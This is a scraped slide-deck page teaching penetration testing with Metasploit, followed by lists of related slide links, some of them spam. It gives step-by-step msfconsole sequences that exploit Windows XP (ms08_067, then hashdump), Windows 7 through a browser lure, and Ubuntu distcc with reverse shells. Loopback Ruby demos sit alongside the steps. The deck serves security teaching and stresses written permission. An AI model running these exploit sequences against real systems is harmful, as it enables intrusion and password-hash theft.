Pen-Testing With Metasploit ▪ By Mohammed Danish Amber
AGENDA ▪ Why & What's Pen-Testing ▪ About Metasploit ▪ Metasploit Basic & Meterpreter ▪ Demo
Mohammed Danish Amber ▪ Geek & Security Analyst ▪ Information Security Enthusiast ▪ Working in TCS ▪ Lecturer & Engineer ▪ Collaborative Project: Hacker Ecosystem ▪ Make the Internet a Secure Place
Why Pen-Testing ▪ Millions of dollars have been invested in security programs to protect critical infrastructure and prevent data breaches ▪ A penetration test is one of the most effective ways to find out whether those programs actually work: it identifies the weaknesses and deficiencies that remain after the controls are in place
What's Pen-Testing ▪ A method to evaluate the security of a computer system / network ▪ Practise (attack) an IT system the way a 'hacker' does: – Find security holes (weaknesses) – Bypass security mechanisms – Compromise the organization's IT systems ▪ YOU MUST HAVE PERMISSION FROM THE IT SYSTEM OWNER, in writing and with an agreed scope, before any of this ▪ WITHOUT IT THE SAME ACTIVITY IS ILLEGAL AND CAN PUT YOU IN JAIL!
ETHICS ▪ THINK BEFORE YOU ACT ▪ DON'T BE STUPID ▪ DON'T BE MALICIOUS
PEN-TESTING PHASES ▪ Information Gathering ▪ Vulnerability Analysis ▪ Exploitation ▪ Post Exploitation ▪ Reporting
Metasploit ▪ Not just a tool but an entire framework ▪ An open-source platform for writing security tools and exploits ▪ Attack vectors are built by combining its modules: exploits, payloads, encoders ▪ Lets you create and execute more advanced attacks than a one-off exploit script ▪ Written in Ruby
Metasploit Interfaces ▪ msfconsole ▪ msfweb, msfgui (discontinued) ▪ Metasploit Pro & Community Edition ▪ Armitage
MSFconsole (screenshot)
MSFcli (screenshot; msfcli was removed from the framework in 2015, and msfconsole -x "<commands>" is the replacement for one-shot use)
Metasploit Terminology ▪ Exploit: code that lets a pentester take advantage of a flaw in a system, application or service; it delivers the payload and does nothing useful on its own ▪ Payload: the code we want the target system to execute once the exploit succeeds (a command shell, Meterpreter, or a few commands) ▪ Shellcode: the raw machine-code instructions that implement a payload when exploitation occurs ▪ Module: a unit of code the framework can load: exploit, payload, auxiliary (scanners, fuzzers), post-exploitation, encoder or nop ▪ Listener: the attacker-side component (exploit/multi/handler) that waits for the payload's incoming connection
How does exploitation work? (diagram) ▪ Attacker sends: exploit + payload ▪ Vulnerable server: exploit runs, then payload runs ▪ Over the resulting session: upload and download data
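The exploit + payload + listener exchange in the diagram above, as an added example that is not part of the original slides: a tiny reverse-TCP listener of the kind exploit/multi/handler provides, and a fake payload that connects back to it. Everything runs on 127.0.0.1, the single "whoami" command the fake payload understands is invented for the demo, and no real exploit is involved; the point is to see which side opens the TCP connection and why.

```ruby
require 'socket'

# Added example, not from the original slides: the reverse_tcp pattern behind
# "Listener: a component waiting for incoming connection". Runs on loopback.

# Attacker side. Equivalent to exploit/multi/handler with LHOST/LPORT set:
# bind, wait, and speak to whatever connects back.
class ReverseTcpListener
  attr_reader :port

  def initialize(host = '127.0.0.1', port = 0)
    @server = TCPServer.new(host, port)
    @port = @server.addr[1] # port 0 lets the OS pick a free port
  end

  # Block until one payload connects, run a single command through it,
  # and return what the payload sent back.
  def handle_one(command)
    client = @server.accept # the *target* opened this connection
    client.puts(command)    # operator -> payload
    output = client.gets    # payload -> operator
    client.close
    output ? output.chomp : nil
  ensure
    @server.close
  end
end

# Target side. Stands in for the code the exploit made the victim execute.
# A real reverse_tcp stager does the same thing: connect(LHOST, LPORT), then
# loop read/execute/write. This fake one knows one harmless command.
def fake_payload(lhost, lport)
  sock = TCPSocket.new(lhost, lport)
  cmd = sock.gets
  cmd = cmd ? cmd.chomp : ''
  sock.puts(cmd == 'whoami' ? 'target-user' : "unknown command: #{cmd}")
  sock.close
end

# The diagram end to end: listener up, exploit "fires" (here: a thread that
# runs the payload), payload connects back, operator runs one command.
# Because the victim initiates the TCP connection, this works through NAT and
# firewalls that only block inbound traffic, which is why reverse_tcp is
# usually preferred over bind_tcp.
def run_exchange(command = 'whoami')
  listener = ReverseTcpListener.new
  target = Thread.new { fake_payload('127.0.0.1', listener.port) }
  output = listener.handle_one(command)
  target.join
  output
end

puts run_exchange if __FILE__ == $PROGRAM_NAME
```

Swap the roles (listener on the target, connect from the attacker) and you have bind_tcp, which only works when the target's port is reachable inbound.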
Meterpreter ▪ An advanced payload, selected at exploit time and delivered once the vulnerability is exploited ▪ Runs in the memory of the exploited process rather than from a file on disk, and extends the session with post-exploitation commands (file access, process migration, privilege escalation, hash dumping) that a plain command shell does not give you
Meterpreter (diagram) ▪ Exploit a vulnerability ▪ Select Meterpreter as the payload ▪ Get a Meterpreter shell
Meterpreter Commands (five screenshot slides; the command listings were not captured in this transcript)
Windows XP Exploitation ▪ msf > search windows/smb ▪ msf > info exploit/windows/smb/ms08_067_netapi ▪ msf > use exploit/windows/smb/ms08_067_netapi ▪ msf exploit(ms08_067_netapi) > show payloads ▪ msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp ▪ msf exploit(ms08_067_netapi) > show options ▪ msf exploit(ms08_067_netapi) > set RHOST <target ip> ▪ msf exploit(ms08_067_netapi) > set LHOST <attacker ip> ▪ msf exploit(ms08_067_netapi) > show options (re-check RHOST and LHOST before firing) ▪ msf exploit(ms08_067_netapi) > exploit ▪ meterpreter > background ▪ msf exploit(ms08_067_netapi) > sessions -l
Windows XP Exploitation ▪ msf exploit(ms08_067_netapi) > sessions -i 1 ▪ meterpreter > getuid (ms08_067 exploits the Server service, so the session normally already runs as NT AUTHORITY\SYSTEM) ▪ meterpreter > getsystem -h (lists the elevation techniques; run getsystem without -h to actually attempt them if getuid shows a lower-privileged user) ▪ meterpreter > hashdump (needs SYSTEM; prints the local SAM as user:rid:lm_hash:nt_hash:::)
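The hashdump step above produces pwdump-format lines that end up in the report. As an added example (not from the original slides), here is a parser and a triage pass over that output: it keeps only well-formed lines, and flags blank passwords, accounts whose LM hash is stored, and a renamed built-in Administrator. The two "empty password" hash constants are the well-known public values; every other hash in the sample is constructed test data, not from any real host.

```ruby
# Added example, not from the original slides: parse Meterpreter `hashdump`
# output and triage it for the report phase.

# LM and NT hashes of the empty string. These are public, well-known values.
EMPTY_LM = 'aad3b435b51404eeaad3b435b51404ee'.freeze
EMPTY_NT = '31d6cfe0d16ae931b73c59d7e0c089c0'.freeze

# hashdump prints pwdump format: user:rid:lm_hash:nt_hash:::
HASHDUMP_LINE = /\A([^:]+):(\d+):([0-9a-f]{32}):([0-9a-f]{32}):::\z/i

HashEntry = Struct.new(:user, :rid, :lm, :nt)

# Constructed sample output (hash values other than the two constants are
# made up and have the right shape only).
SAMPLE_HASHDUMP = <<~DUMP
  [*] Dumping password hashes...
  Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  danish:1003:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
  svc_backup:1004:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
  this line is not a hash and is skipped
DUMP

# One HashEntry per well-formed line. Banners, blank lines and truncated
# output are skipped rather than guessed at.
def parse_hashdump(text)
  text.each_line.map do |line|
    m = HASHDUMP_LINE.match(line.strip)
    m && HashEntry.new(m[1], m[2].to_i, m[3].downcase, m[4].downcase)
  end.compact
end

# Findings as [user, severity, description]. Severity reflects what an
# attacker can do with the hash without cracking it: the NT hash alone is
# enough for pass-the-hash, a stored LM hash means the password is at most
# 14 characters and cracks in minutes, a blank NT hash means no password.
def triage(entries)
  findings = []
  entries.each do |e|
    findings << [e.user, 'critical', 'blank password'] if e.nt == EMPTY_NT
    if e.lm != EMPTY_LM
      findings << [e.user, 'high', 'LM hash stored (password <= 14 chars, trivially crackable)']
    end
    if e.rid == 500 && e.user.downcase != 'administrator'
      findings << [e.user, 'info', 'built-in Administrator renamed (RID 500)']
    end
  end
  findings
end

if __FILE__ == $PROGRAM_NAME
  triage(parse_hashdump(SAMPLE_HASHDUMP)).each do |user, sev, desc|
    puts format('%-14s %-9s %s', user, sev, desc)
  end
end
```

Feed it the text you saved from the session and the findings table is ready for the Reporting phase; the RID check matters because renaming Administrator is a common hardening step that hashdump sees straight through.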
Windows 7 Exploitation ▪ msf > use exploit/windows/browser/ms11_003_ie_css_import ▪ msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp ▪ msf exploit(ms11_003_ie_css_import) > show options ▪ msf exploit(ms11_003_ie_css_import) > set SRVHOST <attacker ip> (the address the lure web server binds to, so it has to be an address we own) ▪ msf exploit(ms11_003_ie_css_import) > set SRVPORT 80 ▪ msf exploit(ms11_003_ie_css_import) > set URIPATH free_iphone6plus.exe ▪ msf exploit(ms11_003_ie_css_import) > set LHOST <attacker ip> (the connect-back address baked into the payload, again ours) ▪ msf exploit(ms11_003_ie_css_import) > set LPORT 443 ▪ msf exploit(ms11_003_ie_css_import) > exploit ▪ This is a client-side exploit: nothing happens until the victim opens http://<attacker ip>:80/free_iphone6plus.exe in a vulnerable Internet Explorer, so just wait
Windows 7 Exploitation ▪ msf exploit(ms11_003_ie_css_import) > sessions -l ▪ msf exploit(ms11_003_ie_css_import) > sessions -i 1 ▪ meterpreter > sysinfo ▪ meterpreter > migrate <pid> (move out of the browser process first: a session still living in iexplore.exe dies when the user closes the tab or the exploit crashes it) ▪ meterpreter > shell
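The two addresses in the browser-exploit slides (SRVHOST for the lure web server, LHOST for the connect-back) both have to be attacker-side, and SRVPORT and LPORT cannot collide on the same interface. As an added example, not from the slides or from Metasploit itself, here is a pre-flight check that catches those mistakes before typing exploit. The option names are the real module options; the check logic, the local-address list and the sample configurations are ours.

```ruby
require 'ipaddr'

# Added example, not from the original slides: sanity-check browser-exploit
# options before running `exploit`. local_ips is the attacker's own address
# list (passed in, so the check needs no network access).

def valid_ip?(s)
  IPAddr.new(s)
  true
rescue IPAddr::InvalidAddressError, ArgumentError
  false
end

# Returns a list of problems; empty means the config is consistent.
# Defaults mirror the framework's: SRVPORT 8080, LPORT 4444.
def check_browser_exploit_options(opts, local_ips)
  problems = []
  srvhost = opts['SRVHOST'].to_s
  lhost   = opts['LHOST'].to_s
  srvport = opts.fetch('SRVPORT', 8080).to_i
  lport   = opts.fetch('LPORT', 4444).to_i

  # The lure web server must bind to an address we own (0.0.0.0 = all of them).
  unless srvhost == '0.0.0.0' || local_ips.include?(srvhost)
    problems << "SRVHOST #{srvhost.inspect} is not a local address: it is where the lure is served from, not the victim"
  end

  # LHOST is embedded in the payload as the connect-back target, so it must be
  # one of our routable addresses; 0.0.0.0 sends the victim nowhere useful.
  unless valid_ip?(lhost) && lhost != '0.0.0.0' && local_ips.include?(lhost)
    problems << "LHOST #{lhost.inspect} must be the attacker's reachable IP, not the victim's"
  end

  # The web server and the payload handler cannot share a port on one interface.
  if srvport == lport && (srvhost == lhost || srvhost == '0.0.0.0')
    problems << "SRVPORT and LPORT are both #{srvport}; the handler and the web server would collide"
  end

  [srvport, lport].each do |p|
    problems << "port #{p} is out of range" unless (1..65535).cover?(p)
  end
  problems
end

if __FILE__ == $PROGRAM_NAME
  # Constructed addresses: 10.0.0.5 is "us", 10.0.0.20 is the victim.
  mine = %w[10.0.0.5 127.0.0.1]
  wrong = { 'SRVHOST' => '10.0.0.20', 'SRVPORT' => 80, 'LHOST' => '10.0.0.20', 'LPORT' => 443 }
  check_browser_exploit_options(wrong, mine).each { |p| puts "[-] #{p}" }
end
```

Run it against the victim-addressed configuration and it reports both address mistakes; with SRVHOST and LHOST set to 10.0.0.5 it stays silent, and setting LPORT to 80 alongside SRVPORT 80 produces the collision warning.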
Ubuntu Exploitation ▪ msf > search distcc ▪ msf > use exploit/unix/misc/distcc_exec ▪ msf exploit(distcc_exec) > show payloads ▪ msf exploit(distcc_exec) > set PAYLOAD cmd/unix/reverse ▪ msf exploit(distcc_exec) > show options ▪ msf exploit(distcc_exec) > set RHOST <target ip> ▪ msf exploit(distcc_exec) > set LHOST <attacker ip> ▪ msf exploit(distcc_exec) > exploit ▪ cmd/unix/reverse gives a plain reverse command shell, not Meterpreter, running with whatever privileges the distccd service has
Any Questions?
Thanks To ▪ Kali / BackTrack Linux ▪ Metasploit Team (HD Moore & rapid7) ▪ Offensive Security / Metasploit Unleashed ▪ David Kennedy ▪ Georgia Weidman ▪ Null Hyderabad Chapter -CORE TEAM ▪ #nullhyd @
WWW.MOHAMMEDDANISHAMBER.COM

More Related Content

What's hot

Network Penetration Testing
Network Penetration TestingNetwork Penetration Testing
Network Penetration TestingMohammed Adam
 
Vulnerability assessment and penetration testing
Vulnerability assessment and penetration testingVulnerability assessment and penetration testing
Vulnerability assessment and penetration testingAbu Sadat Mohammed Yasin
 
Metasploit
MetasploitMetasploit
Metasploithenelpj
 
Nessus-Vulnerability Tester
Nessus-Vulnerability TesterNessus-Vulnerability Tester
Nessus-Vulnerability TesterAditya Jain
 
Introduction To Exploitation & Metasploit
Introduction To Exploitation & MetasploitIntroduction To Exploitation & Metasploit
Introduction To Exploitation & MetasploitRaghav Bisht
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testingNezar Alazzabi
 
Penetration testing reporting and methodology
Penetration testing reporting and methodologyPenetration testing reporting and methodology
Penetration testing reporting and methodologyRashad Aliyev
 
Penetration testing using metasploit
Penetration testing using metasploitPenetration testing using metasploit
Penetration testing using metasploitAashish R
 
Metasploit seminar
Metasploit seminarMetasploit seminar
Metasploit seminarhenelpj
 
Demo of security tool nessus - Network vulnerablity scanner
Demo of security tool nessus - Network vulnerablity scannerDemo of security tool nessus - Network vulnerablity scanner
Demo of security tool nessus - Network vulnerablity scannerAjit Dadresa
 
Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomSiddharth Krishna Kumar
 
CNIT 126 2: Malware Analysis in Virtual Machines & 3: Basic Dynamic Analysis
CNIT 126 2: Malware Analysis in Virtual Machines & 3: Basic Dynamic AnalysisCNIT 126 2: Malware Analysis in Virtual Machines & 3: Basic Dynamic Analysis
CNIT 126 2: Malware Analysis in Virtual Machines & 3: Basic Dynamic AnalysisSam Bowne
 
Security Testing
Security TestingSecurity Testing
Security TestingKiran Kumar
 
Encoded Attacks And Countermeasures
Encoded Attacks And CountermeasuresEncoded Attacks And Countermeasures
Encoded Attacks And CountermeasuresMarco Morana
 

What's hot (20)

Network Penetration Testing
Network Penetration TestingNetwork Penetration Testing
Network Penetration Testing
 
Malware analysis
Malware analysisMalware analysis
Malware analysis
 
Vulnerability assessment and penetration testing
Vulnerability assessment and penetration testingVulnerability assessment and penetration testing
Vulnerability assessment and penetration testing
 
Metasploit
MetasploitMetasploit
Metasploit
 
Nessus-Vulnerability Tester
Nessus-Vulnerability TesterNessus-Vulnerability Tester
Nessus-Vulnerability Tester
 
Introduction To Exploitation & Metasploit
Introduction To Exploitation & MetasploitIntroduction To Exploitation & Metasploit
Introduction To Exploitation & Metasploit
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testing
 
Penetration testing reporting and methodology
Penetration testing reporting and methodologyPenetration testing reporting and methodology
Penetration testing reporting and methodology
 
Penetration testing using metasploit
Penetration testing using metasploitPenetration testing using metasploit
Penetration testing using metasploit
 
Metaploit
MetaploitMetaploit
Metaploit
 
Metasploit seminar
Metasploit seminarMetasploit seminar
Metasploit seminar
 
Demo of security tool nessus - Network vulnerablity scanner
Demo of security tool nessus - Network vulnerablity scannerDemo of security tool nessus - Network vulnerablity scanner
Demo of security tool nessus - Network vulnerablity scanner
 
Burp suite
Burp suiteBurp suite
Burp suite
 
Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenom
 
Snort
SnortSnort
Snort
 
Application Threat Modeling
Application Threat ModelingApplication Threat Modeling
Application Threat Modeling
 
CNIT 126 2: Malware Analysis in Virtual Machines & 3: Basic Dynamic Analysis
CNIT 126 2: Malware Analysis in Virtual Machines & 3: Basic Dynamic AnalysisCNIT 126 2: Malware Analysis in Virtual Machines & 3: Basic Dynamic Analysis
CNIT 126 2: Malware Analysis in Virtual Machines & 3: Basic Dynamic Analysis
 
Security Testing
Security TestingSecurity Testing
Security Testing
 
Bug Bounty 101
Bug Bounty 101Bug Bounty 101
Bug Bounty 101
 
Encoded Attacks And Countermeasures
Encoded Attacks And CountermeasuresEncoded Attacks And Countermeasures
Encoded Attacks And Countermeasures
 

Viewers also liked

44CON 2014 - Meterpreter Internals, OJ Reeves
44CON 2014 - Meterpreter Internals, OJ Reeves44CON 2014 - Meterpreter Internals, OJ Reeves
44CON 2014 - Meterpreter Internals, OJ Reeves44CON
 
Denial Of Service Flooding Detection In Anonymity Networks
Denial Of Service Flooding Detection In Anonymity NetworksDenial Of Service Flooding Detection In Anonymity Networks
Denial Of Service Flooding Detection In Anonymity NetworksJens Oberender
 
Meterpreter in Metasploit User Guide
Meterpreter in Metasploit User GuideMeterpreter in Metasploit User Guide
Meterpreter in Metasploit User GuideKhairi Aiman
 
44CON London 2015 - 15-Minute Linux Incident Response Live Analysis
44CON London 2015 - 15-Minute Linux Incident Response Live Analysis44CON London 2015 - 15-Minute Linux Incident Response Live Analysis
44CON London 2015 - 15-Minute Linux Incident Response Live Analysis44CON
 
La Quadrature Du Cercle - The APTs That Weren't
La Quadrature Du Cercle - The APTs That Weren'tLa Quadrature Du Cercle - The APTs That Weren't
La Quadrature Du Cercle - The APTs That Weren'tpinkflawd
 
44CON London 2015 - How to drive a malware analyst crazy
44CON London 2015 - How to drive a malware analyst crazy44CON London 2015 - How to drive a malware analyst crazy
44CON London 2015 - How to drive a malware analyst crazy44CON
 
Automated Penetration Testing With The Metasploit Framework
Automated Penetration Testing With The Metasploit FrameworkAutomated Penetration Testing With The Metasploit Framework
Automated Penetration Testing With The Metasploit FrameworkTom Eston
 
Post Exploitation Using Meterpreter
Post Exploitation Using MeterpreterPost Exploitation Using Meterpreter
Post Exploitation Using MeterpreterShubham Mittal
 
Metasploit: Pwnage and Ponies
Metasploit: Pwnage and PoniesMetasploit: Pwnage and Ponies
Metasploit: Pwnage and PoniesTrowalts
 
Metasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With MetasploitMetasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With MetasploitAnurag Srivastava
 
Automated Penetration Testing With Core Impact
Automated Penetration Testing With Core ImpactAutomated Penetration Testing With Core Impact
Automated Penetration Testing With Core ImpactTom Eston
 
The complex patient vad ransplant vad exchange or hospice
The complex patient vad ransplant vad exchange or hospiceThe complex patient vad ransplant vad exchange or hospice
The complex patient vad ransplant vad exchange or hospicedrucsamal
 
BSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama ElhamerBSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama ElhamerShellmates
 
Lab 20 active directory right managment services (ad rms)
Lab 20 active directory right managment services (ad rms)     Lab 20 active directory right managment services (ad rms)
Lab 20 active directory right managment services (ad rms) Pham Viet Dung
 
Charlotte ISSA - 2016 - Mainframe Hacking
Charlotte ISSA - 2016 - Mainframe HackingCharlotte ISSA - 2016 - Mainframe Hacking
Charlotte ISSA - 2016 - Mainframe HackingPhilip Young
 
Slide metaploit
Slide metaploitSlide metaploit
Slide metaploitchungdv
 

Viewers also liked (20)

Metasploit
MetasploitMetasploit
Metasploit
 
Basic Metasploit
Basic MetasploitBasic Metasploit
Basic Metasploit
 
44CON 2014 - Meterpreter Internals, OJ Reeves
44CON 2014 - Meterpreter Internals, OJ Reeves44CON 2014 - Meterpreter Internals, OJ Reeves
44CON 2014 - Meterpreter Internals, OJ Reeves
 
Denial Of Service Flooding Detection In Anonymity Networks
Denial Of Service Flooding Detection In Anonymity NetworksDenial Of Service Flooding Detection In Anonymity Networks
Denial Of Service Flooding Detection In Anonymity Networks
 
Meterpreter in Metasploit User Guide
Meterpreter in Metasploit User GuideMeterpreter in Metasploit User Guide
Meterpreter in Metasploit User Guide
 
Ips and-ids
Ips and-idsIps and-ids
Ips and-ids
 
44CON London 2015 - 15-Minute Linux Incident Response Live Analysis
44CON London 2015 - 15-Minute Linux Incident Response Live Analysis44CON London 2015 - 15-Minute Linux Incident Response Live Analysis
44CON London 2015 - 15-Minute Linux Incident Response Live Analysis
 
Messing around avs
Messing around avsMessing around avs
Messing around avs
 
La Quadrature Du Cercle - The APTs That Weren't
La Quadrature Du Cercle - The APTs That Weren'tLa Quadrature Du Cercle - The APTs That Weren't
La Quadrature Du Cercle - The APTs That Weren't
 
44CON London 2015 - How to drive a malware analyst crazy
44CON London 2015 - How to drive a malware analyst crazy44CON London 2015 - How to drive a malware analyst crazy
44CON London 2015 - How to drive a malware analyst crazy
 
Automated Penetration Testing With The Metasploit Framework
Automated Penetration Testing With The Metasploit FrameworkAutomated Penetration Testing With The Metasploit Framework
Automated Penetration Testing With The Metasploit Framework
 
Post Exploitation Using Meterpreter
Post Exploitation Using MeterpreterPost Exploitation Using Meterpreter
Post Exploitation Using Meterpreter
 
Metasploit: Pwnage and Ponies
Metasploit: Pwnage and PoniesMetasploit: Pwnage and Ponies
Metasploit: Pwnage and Ponies
 
Metasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With MetasploitMetasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With Metasploit
 
Automated Penetration Testing With Core Impact
Automated Penetration Testing With Core ImpactAutomated Penetration Testing With Core Impact
Automated Penetration Testing With Core Impact
 
The complex patient vad ransplant vad exchange or hospice
The complex patient vad ransplant vad exchange or hospiceThe complex patient vad ransplant vad exchange or hospice
The complex patient vad ransplant vad exchange or hospice
 
BSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama ElhamerBSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama Elhamer
 
Lab 20 active directory right managment services (ad rms)
Lab 20 active directory right managment services (ad rms)     Lab 20 active directory right managment services (ad rms)
Lab 20 active directory right managment services (ad rms)
 
Charlotte ISSA - 2016 - Mainframe Hacking
Charlotte ISSA - 2016 - Mainframe HackingCharlotte ISSA - 2016 - Mainframe Hacking
Charlotte ISSA - 2016 - Mainframe Hacking
 
Slide metaploit
Slide metaploitSlide metaploit
Slide metaploit
 

Similar to Pen-Testing with Metasploit

Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical HackingRaghav Bisht
 
RIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT  (Raiding Internet of Things)  by Jacob HolcombRIoT  (Raiding Internet of Things)  by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob HolcombPriyanka Aash
 
Penetration Testing and Intrusion Detection System
Penetration Testing and Intrusion Detection SystemPenetration Testing and Intrusion Detection System
Penetration Testing and Intrusion Detection SystemBikrant Gautam
 
Metasploit Computer security testing tool
Metasploit  Computer security testing toolMetasploit  Computer security testing tool
Metasploit Computer security testing toolmedoelkang600
 
[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기
[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기
[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기Ji-Woong Choi
 
Penetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityPenetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityIOSR Journals
 
White Lightning Sept 2014
White Lightning Sept 2014White Lightning Sept 2014
White Lightning Sept 2014Bryce Kunz
 
Automated prevention of ransomware with machine learning and gpos
Automated prevention of ransomware with machine learning and gposAutomated prevention of ransomware with machine learning and gpos
Automated prevention of ransomware with machine learning and gposPriyanka Aash
 
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOsSPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOsRod Soto
 
I got 99 trends and a # is all of them
I got 99 trends and a # is all of themI got 99 trends and a # is all of them
I got 99 trends and a # is all of themRoberto Suggi Liverani
 
Laboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testingLaboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testingseastorm44
 
Common NonStop security hacks and how to avoid them
Common NonStop security hacks and how to avoid themCommon NonStop security hacks and how to avoid them
Common NonStop security hacks and how to avoid themGreg Swedosh
 

Similar to Pen-Testing with Metasploit (20)

iCrOSS 2013_Pentest
iCrOSS 2013_PentestiCrOSS 2013_Pentest
iCrOSS 2013_Pentest
 
Pentesting with linux
Pentesting with linuxPentesting with linux
Pentesting with linux
 
Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical Hacking
 
RIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT  (Raiding Internet of Things)  by Jacob HolcombRIoT  (Raiding Internet of Things)  by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob Holcomb
 
Real life hacking101
Real life hacking101Real life hacking101
Real life hacking101
 
Penetration Testing and Intrusion Detection System
Penetration Testing and Intrusion Detection SystemPenetration Testing and Intrusion Detection System
Penetration Testing and Intrusion Detection System
 
Metasploit
MetasploitMetasploit
Metasploit
 
Metasploit Computer security testing tool
Metasploit  Computer security testing toolMetasploit  Computer security testing tool
Metasploit Computer security testing tool
 
Backtrack Manual Part8
Backtrack Manual Part8Backtrack Manual Part8
Backtrack Manual Part8
 
[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기
[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기
[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기
 
Penetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityPenetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utility
 
White Lightning Sept 2014
White Lightning Sept 2014White Lightning Sept 2014
White Lightning Sept 2014
 
Automated prevention of ransomware with machine learning and gpos
Automated prevention of ransomware with machine learning and gposAutomated prevention of ransomware with machine learning and gpos
Automated prevention of ransomware with machine learning and gpos
 
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOsSPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
 
I got 99 trends and a # is all of them
I got 99 trends and a # is all of themI got 99 trends and a # is all of them
I got 99 trends and a # is all of them
 
Metasploit Humla for Beginner
Metasploit Humla for BeginnerMetasploit Humla for Beginner
Metasploit Humla for Beginner
 
G3t R00t at IUT
G3t R00t at IUTG3t R00t at IUT
G3t R00t at IUT
 
Laboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testingLaboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testing
 
Common NonStop security hacks and how to avoid them
Common NonStop security hacks and how to avoid themCommon NonStop security hacks and how to avoid them
Common NonStop security hacks and how to avoid them
 
Penetration Testing Boot CAMP
Penetration Testing Boot CAMPPenetration Testing Boot CAMP
Penetration Testing Boot CAMP
 

Recently uploaded

W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...panagenda
 
VTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learnVTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learnAmarnathKambale
 
%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...
%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...
%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...masabamasaba
 
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...masabamasaba
 
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM TechniquesAI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM TechniquesVictorSzoltysek
 
%in Midrand+277-882-255-28 abortion pills for sale in midrand
%in Midrand+277-882-255-28 abortion pills for sale in midrand%in Midrand+277-882-255-28 abortion pills for sale in midrand
%in Midrand+277-882-255-28 abortion pills for sale in midrandmasabamasaba
 
WSO2CON2024 - It's time to go Platformless
WSO2CON2024 - It's time to go PlatformlessWSO2CON2024 - It's time to go Platformless
WSO2CON2024 - It's time to go PlatformlessWSO2
 
AI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplateAI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplatePresentation.STUDIO
 
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
